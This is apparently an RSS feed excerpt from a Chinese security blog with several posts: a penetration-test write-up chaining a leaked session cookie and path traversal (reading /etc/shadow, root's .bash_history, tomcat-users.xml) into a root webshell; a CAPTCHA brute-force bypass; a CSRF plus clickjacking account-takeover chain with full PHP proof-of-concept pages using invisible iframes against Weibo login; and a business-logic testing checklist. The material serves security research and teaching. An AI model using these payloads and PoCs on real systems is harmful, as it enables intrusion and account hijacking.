&lt;h3 id=&quot;验证设想a&quot;&gt;验证设想(A)&lt;/h3&gt;

&lt;p&gt;在这里我尝试根据每个URI功能点生成GET请求参数的dict：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;/userCenter/getUser &lt;strong&gt;[获取用户信息URI POST]&lt;/strong&gt;&lt;/p&gt;

    &lt;p&gt;dict: [uId, userId, uName, userName …]&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;/userCenter/showQRcode &lt;strong&gt;[获取二维码图片 POST]&lt;/strong&gt;&lt;/p&gt;

    &lt;p&gt;dict: [uId, userId, uName, userName, imagePath, filePath, codePath, fileName …]&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;生成请求：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;GET /userCenter/getUser?uId=10001
GET /userCenter/getUser?userId=10001
GET /userCenter/getUser?uName=test001
GET /userCenter/getUser?userName=test001
...
GET /userCenter/showQRcode?uId=10001
GET /userCenter/showQRcode?userId=10001
GET /userCenter/showQRcode?uName=test001
GET /userCenter/showQRcode?userName=test001
GET /userCenter/showQRcode?imagePath=../../index.do
GET /userCenter/showQRcode?filePath=../../index.do
GET /userCenter/showQRcode?codePath=../../index.do
GET /userCenter/showQRcode?fileName=../../index.do
...
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;结论&quot;&gt;结论&lt;/h4&gt;

&lt;p&gt;现实残酷，打败了设想。&lt;/p&gt;

&lt;h3 id=&quot;绝处逢生&quot;&gt;绝处逢生&lt;/h3&gt;

&lt;p&gt;就在想放弃的时候，决定打算”垂死挣扎”一下，重新开始”审视”了各个功能模块，眼光又转到了这个二维码地方。（因为二维码的”皮相”，所以很多人都会忽略它）&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x03.png&quot; alt=&quot;QRcode&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里我去解析了二维码的地址：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x04.png&quot; alt=&quot;QRaddress&quot; /&gt;&lt;/p&gt;

&lt;p&gt;失算…失算…，当去访问这个地址的时候，响应报文中会多出这样的头：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;...
Set-Cookie: USESSIONPID=xxx;
...

jpg content
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这时候我就知道是时候修改&lt;code&gt;uId&lt;/code&gt;了，然而修改了没用，根据多年的经验（吹牛）我认为是&lt;code&gt;uSign&lt;/code&gt;参数起了作用，这时候对&lt;code&gt;uSign&lt;/code&gt;进行删除发现不行，会提示&lt;code&gt;uSign&lt;/code&gt;参数不存在，当我置空这个参数，发现居然成功了又返回了用户的Cookie凭证…好吧，说明这里有一个逻辑问题…&lt;/p&gt;

&lt;p&gt;到这下去就很简单了，获取管理员权限有上传点，测试使用jhtml的后缀可以直接绕过上传，但是上传上去之后，直接访问就给你download下来了（很多次遇到这种问题…）&lt;/p&gt;

&lt;p&gt;好吧，管理员也没啥能危害到服务器的东西了…不过回过头再来看看，二维码这个点还没啃完呢，&lt;code&gt;fileName&lt;/code&gt;这个参数还没去测试，fuzzdb了解一下，先怼lfi的字典进去跑（有个坑这里一定要填写完整[uId, uSign]），然后再进行Fuzz：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x05.png&quot; alt=&quot;fuzzdb lfi&quot; /&gt;&lt;/p&gt;

&lt;p&gt;从&lt;strong&gt;intruder模块(BurpSuite)&lt;/strong&gt;的测试结果发现这里是可以读取文件的，并且判断这个web服务是root权限运行的因为我修改&lt;code&gt;fileName&lt;/code&gt;参数的值为&lt;code&gt;../../../etc/shadow&lt;/code&gt;时我直接可以获取到文件的内容，从而获取root账号权限的密码：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x06.png&quot; alt=&quot;cat shadow&quot; /&gt;&lt;/p&gt;

&lt;p&gt;(解密不了)，怎么通过这个本地文件读取漏洞拿到shell？我的思路是通过读取tomcat的密码配置文件然后进入tomcat的Web管理部署war包进行getwebshell，但是这里做了一圈的目录猜解，死活没找到tomcat的应用目录…&lt;/p&gt;

&lt;p&gt;读取&lt;code&gt;/root/.bash_history&lt;/code&gt;啊(这个文件是记录root用户输入过的命令-&lt;strong&gt;老师傅提醒到&lt;/strong&gt;)，突然间我茅塞顿开，是啊，一般运维人员会通过命令行进行管理，那么肯定会有目录出现啊。&lt;/p&gt;

&lt;p&gt;我修改&lt;code&gt;fileName&lt;/code&gt;参数的值为&lt;code&gt;../../../root/.bash_history&lt;/code&gt;，搜索下关键词tomcat就发现了：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x07.png&quot; alt=&quot;tomcat path&quot; /&gt;&lt;/p&gt;

&lt;p&gt;成功的发现了root用户的命令历史并且找到了Tomat的应用安装路径，那么我只需要修改fileName的参数值为&lt;code&gt;../../../../home/apache-tomcat-7.0.67/conf/tomcat-users.xml&lt;/code&gt;，直接就可以读取到Tomcat的管理员账号权限，从而直接通过外部访问的形式进入Tomcat的管理界面进行控制。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x08.png&quot; alt=&quot;tomcat config&quot; /&gt;&lt;/p&gt;

&lt;p&gt;登录进来之后直接到WAR file to deploy功能点，进行war包的部署（在这里使用压缩的方式将网站后门压缩成zip格式然后修改后缀名.zip为.war即可），点击Browser选择war包然后点击Deploy：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x09.png&quot; alt=&quot;war deploy&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里部署上去之后回到Applications功能点，可以看到部署的情况，点击你的命名链接然后加上你压缩的文件名（这里我的是 /vulkey/vulkey.jsp）使用Webshell管理工具进行管理，看见了我久违的界面，久违的root权限：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-06-20/0x10.png&quot; alt=&quot;shell&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;总结&quot;&gt;总结&lt;/h1&gt;

&lt;p&gt;因为后渗透可能会影响正常业务的运行，所以没有继续进行下去，很遗憾，希望下次有机会。
END:
送给大家一句话：心细则挖天下。&lt;/p&gt;
</description>
          <pubDate>2018-06-20T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-06-20/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-06-20/1</guid>
        </item>
      
    
      
        <item>
          <title>密码重置思路-小密圈的一道题</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;考验技能：黑盒逻辑思考思维&lt;/p&gt;

&lt;!-- more --&gt;

&lt;p&gt;提示：http://gh0st.cn/archives/2018-04-18/1 （文中出现过这个思路）&lt;/p&gt;

&lt;p&gt;题目链接：已经下线（密码重置）&lt;/p&gt;

&lt;p&gt;一般来说，很多人应该先走一遍流程：&lt;/p&gt;

&lt;h2 id=&quot;走流程&quot;&gt;走流程&lt;/h2&gt;

&lt;ol&gt;
  &lt;li&gt;验证码发送&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x01.png&quot; alt=&quot;0x01&quot; /&gt;&lt;/p&gt;

&lt;p&gt;返回包：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x02.png&quot; alt=&quot;0x02&quot; /&gt;&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;验证码验证&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x03.png&quot; alt=&quot;0x03&quot; /&gt;&lt;/p&gt;

&lt;p&gt;错误返回：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x04.png&quot; alt=&quot;0x04&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;流程分析&quot;&gt;流程分析&lt;/h2&gt;

&lt;h3 id=&quot;察言观色&quot;&gt;察言观色&lt;/h3&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x06.png&quot; alt=&quot;0x06&quot; /&gt;&lt;/p&gt;

&lt;p&gt;如上是发送验证码请求对应的响应报文，从报文可以获取到如下的信息：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;后端验证验证码的方式是基于SESSION会话ID的&lt;/li&gt;
  &lt;li&gt;验证码的形势是4位数纯数字&lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;缺陷发现&quot;&gt;缺陷发现&lt;/h3&gt;

&lt;p&gt;四位数纯数字，爆破一下？可是问题来了~&lt;/p&gt;

&lt;p&gt;错误三次之后就提示失效了验证码：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x05.png&quot; alt=&quot;0x05&quot; /&gt;&lt;/p&gt;

&lt;p&gt;怎么办？这是一道考思维的题目，国内太多的逻辑漏洞的文章了，可是大多数人学习的是1:1的学习，不会变通。逻辑漏洞不仅仅存在于固有的业务逻辑上，还有代码逻辑~打开你的黑盒测试思维，任何点你都只能猜测，所以为什么不多猜猜？&lt;/p&gt;

&lt;p&gt;文章中写过会有万能密码的存在：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x07.png&quot; alt=&quot;0x07&quot; /&gt;&lt;/p&gt;

&lt;p&gt;测试下在这里并不存在，没有这样的缺陷，这时候你就需要考虑更多的东西，不要做个“表面性”测试的“白帽子”~&lt;/p&gt;

&lt;p&gt;之前说了错误三次验证码会失效，但是否是真的失效了？假设没有失效只是“表面性”的输出失效呢？&lt;/p&gt;

&lt;p&gt;思考后台代码逻辑，参考我提示中链接的文章：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x08.png&quot; alt=&quot;0x08&quot; /&gt;&lt;/p&gt;

&lt;p&gt;在这里代入到密码重置这一环节是否有用呢？来测试下：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x09.png&quot; alt=&quot;0x09&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里多了一线生机，因为提示了密码错误，而不是失效，那么是否能借助这个来绕过次数限制呢？&lt;/p&gt;

&lt;p&gt;在这里你可以选择使用Python来帮助你，但我认为这完全没必要，因为BurpSuite解决了一切：&lt;/p&gt;

&lt;p&gt;数据包发送到intruder模块，设置attack type为Pitchfork，设置好payload位置：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x10.png&quot; alt=&quot;0x10&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Pitchfork的工作模式是多组的，如上我设置了两个payload位置，使用这个模式需要两个payload的数量是一样的，发送的请求为A[1]对B[1]。&lt;/p&gt;

&lt;p&gt;设置payload：&lt;/p&gt;

&lt;p&gt;第一个为字符块（Character blocks）-这种类型的Payload是指使用一个给出的输入字符串，根据指定的设置产生指定大小的字符块，表现形式为生成指定长度的字符串。&lt;/p&gt;

&lt;p&gt;第二个为数字（Numbers）-这种类型的Payload是指根据配置，生成一系列的数字作为Payload。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x11.png&quot; alt=&quot;0x11&quot; /&gt;&lt;/p&gt;

&lt;p&gt;测试发现真实可用：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-05-05/0x12.png&quot; alt=&quot;0x12&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;总结&quot;&gt;总结&lt;/h2&gt;

&lt;p&gt;黑盒测试的精华是什么？Fuzzing.&lt;/p&gt;

&lt;p&gt;你现在掌握的思路归根到底都是Fuzzing的结晶。&lt;/p&gt;

&lt;p&gt;在漏洞挖掘中打开你的思维，加油~&lt;/p&gt;
</description>
          <pubDate>2018-05-05T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-05-05/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-05-05/1</guid>
        </item>
      
    
      
        <item>
          <title>CSRF之你登陆我的账号#业务逻辑组合拳劫持你的权限</title>
          <description>&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;这是一个理论上通杀很多大型企业网站的漏洞缺陷~&lt;/p&gt;

&lt;!-- more --&gt;

&lt;p&gt;可能很多朋友点击来看见标题就觉得，&lt;code&gt;这家伙在吹牛逼了我倒要看看这货能怎么吹,CSRF之登陆我的账号能有啥玩意危害？ &lt;/code&gt;&lt;/p&gt;

&lt;p&gt;先按奈住你心中不屑的情绪，听我慢慢道来~&lt;/p&gt;

&lt;h2 id=&quot;通用业务功能分析&quot;&gt;通用业务功能分析&lt;/h2&gt;

&lt;p&gt;最近很喜欢挖一些通用漏洞（不是程序通用，而是功能通用），会经常拿着BAT三家以及其他一些大型网站进行业务功能点的对比，来看看有哪些是共用的功能点，这边列出以下的几条：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;QQ快捷登陆&lt;/li&gt;
  &lt;li&gt;微信快捷登陆&lt;/li&gt;
  &lt;li&gt;微博快捷登陆&lt;/li&gt;
  &lt;li&gt;其他……&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x00.png&quot; alt=&quot;0x00.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;OAuth2.0认证缺陷-快捷登陆账号劫持的问题具体可以参考：http://gh0st.cn/archives/2018-02-12/1 （&lt;strong&gt;来自i春秋社区&lt;/strong&gt;）&lt;/p&gt;

&lt;p&gt;这种问题其实需要一定的运气因为很多的快捷登陆有state参数的干扰，所以是完全没办法去利用的。&lt;/p&gt;

&lt;p&gt;在这里我尝试能不能挖到一个新的缺陷，在走正常的快捷登陆流程时我发现需要绑定这个网站的账号才可以正常的使用用户的功能，这时候反着想网站的用户中心是否有第三方的账号绑定？&lt;/p&gt;

&lt;p&gt;这里找了大部分的网站都有这样的功能（第三方账号绑定，绑定了即可使用第三方账号直接登陆），找到了这个功能点就可以来测试，先走一遍正常的绑定流程：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;点击绑定第三方账号&lt;/li&gt;
  &lt;li&gt;进入第三方账号绑定页面&lt;/li&gt;
  &lt;li&gt;（如果第三方账号是登陆状态）-&amp;gt;需要点击授权按钮；(如果第三方账号是未登陆状态)-&amp;gt;需要输入第三方的账号密码登陆-&amp;gt;点击授权按钮&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x01.png&quot; alt=&quot;0x01.png&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;设立猜想&quot;&gt;设立猜想&lt;/h2&gt;

&lt;p&gt;梳理了流程之后，一个很骚的思路就从脑子里蹦了出来：&lt;/p&gt;

&lt;p&gt;有第三方账号绑定这个功能，登陆处也有第三方账号登陆功能，也就是说绑定第三方账号代表着权限分享给了第三方账号。&lt;/p&gt;

&lt;p&gt;猜想建立-&amp;gt;如果我有第三方账号所在网站的&lt;code&gt;CSRF之你登陆我的账号&lt;/code&gt;缺陷，让受害者先登陆我的第三方账号（为了避免损失，我可以注册一个小号），然后绑定处也有CSRF绑定的缺陷或者点击劫持问题，那么我就可以让受害者绑定我的第三方账号，然后根据我的第三方账号来登陆受害者的账号，劫持到其权限。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x02.png&quot; alt=&quot;0x02.png&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;验证猜想&quot;&gt;验证猜想&lt;/h2&gt;

&lt;h3 id=&quot;流程&quot;&gt;流程&lt;/h3&gt;

&lt;p&gt;个人中心有这个第三方的账号绑定：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x03.png&quot; alt=&quot;0x03.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;在这里QQ、github、微博、微信四个第三方账号绑定中我有了微博的&lt;code&gt;CSRF之你登陆我的账号&lt;/code&gt;这个缺陷，所以这里测试下微博的第三方账号绑定。&lt;/p&gt;

&lt;p&gt;页面有微博账号绑定的跳转链接：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x04.png&quot; alt=&quot;0x04&quot; /&gt;&lt;/p&gt;

&lt;p&gt;通过这个链接进入了绑定的界面（未登陆微博）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x05.png&quot; alt=&quot;0x05.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;通过这个链接进入了绑定的界面（已登陆微博）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x06.png&quot; alt=&quot;0x06.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当我授权绑定之后，微博发生了变化，管理中心-&amp;gt;我的应用-&amp;gt;我的应用：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x07.png&quot; alt=&quot;0x07.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;会多出这个网站在里面，那么这个变化是对我们有利的，还是？&lt;/p&gt;

&lt;p&gt;这里我解绑了微博，然后再使用这个已经授权了的微博进行绑定，发现居然不用点击授权了，直接就绑定了。&lt;/p&gt;

&lt;p&gt;很显然，在这里这个&lt;code&gt;便利&lt;/code&gt;解决了一些攻击的利用难度。&lt;/p&gt;

&lt;h3 id=&quot;实现&quot;&gt;实现&lt;/h3&gt;

&lt;p&gt;我们现在具备的几个条件：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;微博的&lt;code&gt;CSRF之你登陆我的账号&lt;/code&gt;缺陷：&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;登陆你的微博，然后访问http://login.sina.com.cn/sso/crossdomain.php?action=login，会返回这样的内容给你：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x08.png&quot; alt=&quot;0x08.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;其中arrURL对应的链接就是凭证登陆的~&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;你的微博已经授权过了要存在缺陷的网站(这里方便直接跳转而不用再去点击按钮！所以你可以先用自己的微博绑定下存在缺陷的网站的账号，然后解绑就行了~)&lt;/li&gt;
  &lt;li&gt;绑定请求存在csrf的缺陷（这里因为是GET请求类型 &lt;code&gt;/oauth/weibo/redirect&lt;/code&gt;，而一般不会对GET请求类型进行CSRF的限制~~）&lt;/li&gt;
&lt;/ol&gt;

&lt;h4 id=&quot;场景1攻击步骤&quot;&gt;场景1.攻击步骤：&lt;/h4&gt;

&lt;p&gt;对方点开凭证链接登陆了你的微博，对方点开绑定微博的链接，绑定了你的微博，完成攻击。&lt;/p&gt;

&lt;p&gt;考虑到凭证时效性的问题，在这里写了一个动态的PoC：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;&amp;lt;?php
//get weibo login token
$curl = curl_init();
$cookie = &quot;你微博的Cookie&quot;;
curl_setopt($curl, CURLOPT_URL, &apos;http://login.sina.com.cn/sso/crossdomain.php?action=login&apos;);
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_COOKIE, $cookie);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($curl);
curl_close($curl);
//echo $data;
$t = preg_match(&apos;/ticket=(.*?)&amp;amp;sso/&apos;, $data, $res);
$url = &quot;https://passport.weibo.com/wbsso/login?ticket={$res[1]}&amp;amp;ssosavestate=1556602678&quot;;
?&amp;gt;

&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;style type=&quot;text/css&quot;&amp;gt; 
.testframe {
	height: 100%;
} 
iframe {
	height: 100%;
	width: 100%;
	border: 0;
	margin: 0;
	padding: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
    filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
    -moz-opacity: 0; /*提供给火狐浏览器的*/
    -webkit-opacity: 0; /*提供给webkit内核的*/
    -khtml-opacity: 0; /*提供给KHTML内核的*/
    -ms-filter: &quot;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&quot;; /*提供给IE8之后的*/
    opacity: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
}
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;div class=&quot;testframe&quot;&amp;gt;
	&amp;lt;iframe id=&quot;test0&quot; src=&quot;&amp;lt;?php echo $url;?&amp;gt;&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;script&amp;gt;
function loadsrc(){
    document.getElementById(&quot;test0&quot;).src=&quot;https://gh0st.cn/oauth/weibo/redirect&quot;;
}
setTimeout(&quot;loadsrc()&quot;,2000);
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;场景2攻击步骤&quot;&gt;场景2.攻击步骤：&lt;/h4&gt;

&lt;p&gt;有些网站可能是post请求限制了referer或者根本没有跳转的请求而是直接进入了微博的绑定界面，因为state参数的原因导致根本无法以这个绑定页面为链接的形式去做攻击~&lt;/p&gt;

&lt;p&gt;可能有很多朋友就有疑问了，为什么我老是提到state参数？这个参数是干什么用的呢？这里参考下微博的OAuth2.0接口的开发文档：&lt;/p&gt;

&lt;p&gt;http://open.weibo.com/wiki/Oauth2/authorize&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x09.png&quot; alt=&quot;0x09.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;是防止CSRF的，也就是说在这里如果绑定的链接是如下这样子的：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x10.png&quot; alt=&quot;0x10.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;没有state参数验证的，那么你可以直接以此作为绑定链接，&lt;strong&gt;覆盖场景1中PoC里面的这个链接&lt;/strong&gt;:&lt;code&gt;https://gh0st.cn/oauth/weibo/redirect&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;好了，说了那么多跟场景2没用的话，切入主题来说说场景2的情况到底该如何完成攻击？&lt;/p&gt;

&lt;p&gt;很简单我们可以使用点击劫持来完成攻击，如下动态的PoC：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;&amp;lt;?php
//get weibo login token
$curl = curl_init();
$cookie = &quot;你微博的Cookie&quot;;
curl_setopt($curl, CURLOPT_URL, &apos;http://login.sina.com.cn/sso/crossdomain.php?action=login&apos;);
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_COOKIE, $cookie);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($curl);
curl_close($curl);
//echo $data;
$t = preg_match(&apos;/ticket=(.*?)&amp;amp;sso/&apos;, $data, $res);
$url = &quot;https://passport.weibo.com/wbsso/login?ticket={$res[1]}&amp;amp;ssosavestate=1556602678&quot;;
?&amp;gt;

&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;style type=&quot;text/css&quot;&amp;gt; 
.testframe {
	height: 100%;
} 
iframe {
	height: 100%;
	width: 100%;
	border: 0;
	margin: 0;
	padding: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
    filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
    -moz-opacity: 0; /*提供给火狐浏览器的*/
    -webkit-opacity: 0; /*提供给webkit内核的*/
    -khtml-opacity: 0; /*提供给KHTML内核的*/
    -ms-filter: &quot;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&quot;; /*提供给IE8之后的*/
    opacity: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
}
.btn {
    position: fixed;
    width: 70px;
    height: 22px;
    left: 167px;
    right: 0;
    display:block;
    top: 295px;
} 
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;div class=&quot;testframe&quot;&amp;gt;
    &amp;lt;input type=&quot;button&quot; class=&quot;btn&quot; value=&quot;Click&quot;&amp;gt;
	&amp;lt;iframe id=&quot;test0&quot; src=&quot;&amp;lt;?php echo $url;?&amp;gt;&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;script&amp;gt;
function loadsrc(){
	document.getElementById(&quot;test0&quot;).src=&quot;https://gh0st.cn/usercenter/ubind&quot;;
}
setTimeout(&quot;loadsrc()&quot;,2000);
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;简单的说明下这个PoC的用处：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-28/0x11.png&quot; alt=&quot;0x11.png&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;总结&quot;&gt;总结&lt;/h2&gt;

&lt;p&gt;可能把每一项单独的拎出来会发现这并没有缺陷，但是一旦参与到了业务逻辑中，就一定会存在一定的问题。&lt;/p&gt;

&lt;p&gt;不要看不起一个看似没危害的漏洞甚至一个缺陷，因为你永远不知道它能发挥的巨大危害。&lt;/p&gt;
</description>
          <pubDate>2018-04-28T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-04-28/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-04-28/1</guid>
        </item>
      
    
      
        <item>
          <title>Web安全测试学习手册-业务逻辑测试</title>
          <description>&lt;p&gt;首先感谢朋友倾璇的邀请 http://payloads.online/archivers/2018-03-21/1 ，参与了&lt;web安全测试学习手册&gt;的相关撰写，目前负责业务逻辑测试这一块的撰写，目前初步已经成型，先发出来让大家看看，欢迎点评，也可以加入我们一起来撰写~&lt;/web安全测试学习手册&gt;&lt;/p&gt;

&lt;h1 id=&quot;业务逻辑测试&quot;&gt;业务逻辑测试&lt;/h1&gt;

&lt;p&gt;介绍：这里对Web应用业务逻辑方面的安全缺陷进行介绍和常见案例讲解。
&lt;!-- more --&gt;&lt;/p&gt;

&lt;h2 id=&quot;任意用户密码重置&quot;&gt;任意用户密码重置&lt;/h2&gt;

&lt;h3 id=&quot;常见的缺陷&quot;&gt;常见的缺陷&lt;/h3&gt;

&lt;h4 id=&quot;-1验证码类缺陷&quot;&gt;* 1.验证码类缺陷&lt;/h4&gt;

&lt;p&gt;-场景：
1.1 验证码回显在客户端(响应主体、Set-Cookie等等…)。&lt;/p&gt;

&lt;p&gt;1.2 验证码过于简易时效性过长，接口未做限制(一般为纯数字4-8位数，时效性长达30分钟以上可以对验证码进行枚举)。&lt;/p&gt;

&lt;h4 id=&quot;-2未校验权限前端校验越权&quot;&gt;* 2.未校验权限/前端校验/越权&lt;/h4&gt;

&lt;p&gt;-场景：
2.1 任意手机号验证码都可重置任意账号。&lt;/p&gt;

&lt;p&gt;2.2 修改响应包的主体(根据实际情况来修改 例如验证请求对应的响应报文的主体为&lt;code&gt;false&lt;/code&gt; 你可以修改为&lt;code&gt;true&lt;/code&gt;)。&lt;/p&gt;

&lt;p&gt;2.3 同一浏览器进入A用户的重置，然后关闭再进入B用户的重置 而实际上重置A用户。&lt;/p&gt;

&lt;p&gt;2.4 修改重置密码的相关参数(例如 userid等等…)。&lt;/p&gt;

&lt;h4 id=&quot;-3host头伪造&quot;&gt;* 3.HOST头伪造&lt;/h4&gt;

&lt;p&gt;-场景：
3.1 在邮箱找回密码的时候，可以简单替换Host部分进行Fuzz，看看找回密码的链接中的域名是否是根据Host来生成的如果是可以替换成自己的域名。但是这种思路很鸡肋，因为需要用户的点击，这样才可以根据日志看到重置密码的链接，万一重置密码的链接时效性过去就无奈了。&lt;/p&gt;

&lt;h4 id=&quot;-4找回密码的凭证脆弱&quot;&gt;* 4.找回密码的凭证脆弱&lt;/h4&gt;

&lt;p&gt;-场景：
4.1 见过最多的是找回密码的token是base64编码的，而解码后的明文根据其规则修改就可以成为别人用户找回密码的凭证了。&lt;/p&gt;

&lt;h2 id=&quot;验证码绕过&quot;&gt;验证码绕过&lt;/h2&gt;

&lt;h3 id=&quot;常见的缺陷-1&quot;&gt;常见的缺陷&lt;/h3&gt;

&lt;h4 id=&quot;图形类验证码绕过&quot;&gt;图形类验证码绕过&lt;/h4&gt;

&lt;h5 id=&quot;-1图形验证码可复用&quot;&gt;* 1.图形验证码可复用&lt;/h5&gt;

&lt;p&gt;-场景：
3.1 验证码刷新之后，而历史刷新的验证码还是可以继续使用。&lt;/p&gt;

&lt;p&gt;3.2 验证码使用过后不刷新，时效性不过期，可以一直复用。&lt;/p&gt;

&lt;h5 id=&quot;-2图形验证码易识别&quot;&gt;* 2.图形验证码易识别&lt;/h5&gt;

&lt;p&gt;-场景
4.1 很多验证码的显示很简单，容易被机器识别。&lt;/p&gt;

&lt;h4 id=&quot;短信类验证码绕过&quot;&gt;短信类验证码绕过&lt;/h4&gt;

&lt;h5 id=&quot;-1验证码过于简易接口未限制&quot;&gt;* 1.验证码过于简易&amp;amp;接口未限制&lt;/h5&gt;

&lt;p&gt;-场景：
1.1 有些手机短信验证码都为 4-8位 纯数字的验证码，在接口没有任何限制的情况下是可以直接爆破的。&lt;/p&gt;

&lt;h5 id=&quot;-2验证码发送复用时效性过长接口未限制&quot;&gt;* 2.验证码发送复用&amp;amp;时效性过长&amp;amp;接口未限制&lt;/h5&gt;

&lt;p&gt;-场景：
